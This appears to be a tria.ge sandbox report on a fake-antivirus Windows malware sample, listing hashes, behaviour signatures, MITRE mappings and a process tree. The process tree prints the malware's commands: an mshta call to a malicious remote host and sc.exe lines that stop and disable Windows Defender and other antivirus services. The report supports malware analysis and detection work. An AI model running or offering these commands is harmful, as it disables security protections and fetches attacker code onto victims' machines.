Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
152s -
max time network
159s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
-
submitted
30/12/2023, 23:12
General
-
Target
1f9b619074e3ef7c19b296330e290dde.exe
-
Size
2.0MB
-
MD5
1f9b619074e3ef7c19b296330e290dde
-
SHA1
8342d1aa1cef5d5d10ee68a4dfcca4de12599502
-
SHA256
a6e0ce289db711413ba5395a80e50a0ed95c3927448492d3ecde38506227c571
-
SHA512
3ae7ef2c3181b44816e0cb7186b113c8e99d97e06a56d7b4babf283cdc342f18273e39c66912c41bdbbabc62303bb8bb998cee9db0234847a521df46ae6784c6
-
SSDEEP
49152:DKqoP5uG7LG6sjWmlwsg7IklBKZICcDIGXQvh9zK4tMy+iZKnkJeYuFEb:DQP5uGvC9bg7DlBqICchX8W1iZgkJLuo
Malware Config
Extracted
http://galaint.coolsecupdate.info/?0=154&1=1&2=1&3=35&4=i&5=9200&6=6&7=2&8=919041&9=1033&10=0&11=0000&12=mgrdvyopcy&14=1
Signatures
-
UAC bypass 3 TTPs 3 IoCs
-
Disables taskbar notifications via registry modification
-
Sets file execution options in registry 2 TTPs 64 IoCs
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 3 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Drops file in System32 directory 3 IoCs
-
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies Internet Explorer settings 1 TTPs 39 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of FindShellTrayWindow 5 IoCs
-
Suspicious use of SendNotifyMessage 4 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
-
Suspicious use of WriteProcessMemory 44 IoCs
-
System policy modification 1 TTPs 4 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\1f9b619074e3ef7c19b296330e290dde.exe"C:\Users\Admin\AppData\Local\Temp\1f9b619074e3ef7c19b296330e290dde.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\f193n15598i0567.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\f193n15598i0567.exe" -e -pm1it982889f92662⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\13tu7hiem9f2421.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\13tu7hiem9f2421.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Protector-qxsn.exeC:\Users\Admin\AppData\Roaming\Protector-qxsn.exe4⤵
- UAC bypass
- Sets file execution options in registry
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in System32 directory
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\SysWOW64\mshta.exemshta.exe "http://galaint.coolsecupdate.info/?0=154&1=1&2=1&3=35&4=i&5=9200&6=6&7=2&8=919041&9=1033&10=0&11=0000&12=mgrdvyopcy&14=1"5⤵
-
-
C:\Windows\SysWOW64\sc.exesc config AntiVirSchedulerService start= disabled5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc config AntiVirService start= disabled5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc stop AntiVirService5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc config ekrn start= disabled5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc stop msmpsvc5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled5⤵
- Launches sc.exe
-
-
C:\Windows\SysWOW64\sc.exesc stop WinDefend5⤵
- Launches sc.exe
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" res://ieframe.dll/navcancl.htm#http://myipreal.info/5⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3812 CREDAT:17410 /prefetch:26⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\13TU7H~1.EXE" >> NUL4⤵
-
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
17KB
MD55a34cb996293fde2cb7a4ac89587393a
SHA13c96c993500690d1a77873cd62bc639b3a10653f
SHA256c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee
-
Filesize
1.4MB
MD5bd732cba69519d4dc6b5c2b6c4f9bf45
SHA1b26d1b54450e012160c41de303b219ee826c9d43
SHA25647dc8ea9f4473b08c1e2d92ad77f673eb2d3af5dcc8f6e13d2300a5e92858c95
SHA512526fd478aa42669f908050d172a9f67ec7a212a6596033b789aa947833ca08b5596cd8e9234447c12cbed3e657ae34787e30bcd65ccbe8594b72ec72750dd42d
-
Filesize
1.4MB
MD5268d5439d8d1246296fb22ba97d3a1b8
SHA15d315983acaed9b0f3741d1d8faa3612af436158
SHA256dd8234f32f3cd2acb70c6ee2b48142c7e06e33840ee73be12327b7037da0403e
SHA512e74097608213eb0e2a48c6605864df05ad7f41c610d70a01d462432ee6f01f9b8aa45448bcacd9d69d972e02fb8587f5c1461b400b5d1175cf5db06c4b126047
-
Filesize
1.1MB
MD57f03e1e86c87a513a1e026196031bbba
SHA10fe4cb1d0a441c86568bda3260441d8b27dcc589
SHA25667f625b2813fb0265cccb482f2c84edcedf6351eb78286d4f3d7bf352971f2ff
SHA512c3122c27d9bfaefbda5ae14195931d2292a063b4c747746f4bdcdd2399aae7ffa0e9e5dc6514e5a7730763fd35e417e46376d7d1dcf15f5305915b8223e8e5de
-
Filesize
661KB
MD52624bb7187e84f2ab148690a14c97886
SHA1eb84b6e125af0c414ac923c184633e9bf16e686a
SHA25686635a0068b359c33ebe9c1f9ff9c9f94d3d03f0368071ba12386901e2df9d8a
SHA5124d05d6b29a71e7e8b11a57b65e25ba06e98587e595df796047822705c11932ecf1a9df5af4fcf004426af66a223dc02b44a54943edaec64a78d2c6f3268e83ec
-
Filesize
381KB
MD57b6b4ad71f925e7a93345d16a8e5763d
SHA1c00dbc0468562636bbc3cd72b848bfbafdda311f
SHA256cbff098ed0c93b3e906c4927d3d05afb2e0d5c881d3f06e20a5a3dcb19889a45
SHA51216117c7e1f35b9bf4fa5743937e9689ff4d1a6f08d977b20a0470d3f5c09bb6970e7a356dc5e5c7596c7dc072988e1826f1ce02e58302c493c8ed3d86f3398f7
-
Filesize
360KB
-
Filesize
4.0MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4.0MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4.0MB
-
Filesize
4.0MB
-
Filesize
4.0MB
-
Filesize
4.0MB
-
Filesize
4.0MB
-
Filesize
4.0MB
-
Filesize
4.0MB
-
Filesize
4.0MB
-
Filesize
4.0MB
-
Filesize
4.0MB
-
Filesize
4.0MB
-
Filesize
4.0MB
-
Filesize
4.0MB
-
Filesize
4.0MB